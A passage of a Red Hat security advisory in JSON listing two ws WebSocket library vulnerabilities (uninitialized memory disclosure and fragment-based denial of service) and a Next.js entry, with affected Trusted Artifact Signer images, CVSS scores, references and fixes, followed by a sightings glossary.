"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "next.js: Next.js: Information disclosure via security fix bypass in middleware with Turbopack"
},
{
"cve": "CVE-2026-45736",
"cwe": {
"id": "CWE-824",
"name": "Access of Uninitialized Pointer"
},
"discovery_date": "2026-05-15T16:00:55.786944+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477914"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ws, an open source WebSocket client and server for Node.js. The `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument. This can lead to the disclosure of sensitive information from uninitialized memory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in the `ws` WebSocket library for Node.js could lead to sensitive information disclosure. The flaw occurs when a `TypedArray` is specifically provided as the `reason` argument to the `websocket.close()` function, potentially exposing uninitialized memory. Red Hat products utilizing this library may be affected if their implementations allow for such a crafted `close()` call.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-45736"
},
{
"category": "external",
"summary": "RHBZ#2477914",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477914"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-45736",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45736"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-45736",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45736"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086",
"url": "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx",
"url": "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx"
}
],
"release_date": "2026-05-15T14:53:57.263000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`"
},
{
"cve": "CVE-2026-48779",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-06-16T22:01:24.571224+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2489661"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ws, an open source WebSocket client and server. A remote attacker can exploit this memory exhaustion vulnerability by sending a high volume of exceptionally small fragments and data chunks. This action forces the affected component to allocate and hold structural wrappers that consume excessive memory. Consequently, this leads to process termination and a denial of service (DoS) for the remote peer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the `ws` WebSocket library. A remote attacker can exploit this flaw by sending a high volume of small, fragmented data, leading to excessive memory consumption and subsequent process termination. This can result in service disruption for Red Hat products that utilize `ws` for WebSocket communication.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48779"
},
{
"category": "external",
"summary": "RHBZ#2489661",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2489661"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48779",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48779"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48779",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48779"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7",
"url": "https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53",
"url": "https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94",
"url": "https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8",
"url": "https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p",
"url": "https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p"
}
],
"release_date": "2026-06-16T21:26:22.537000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.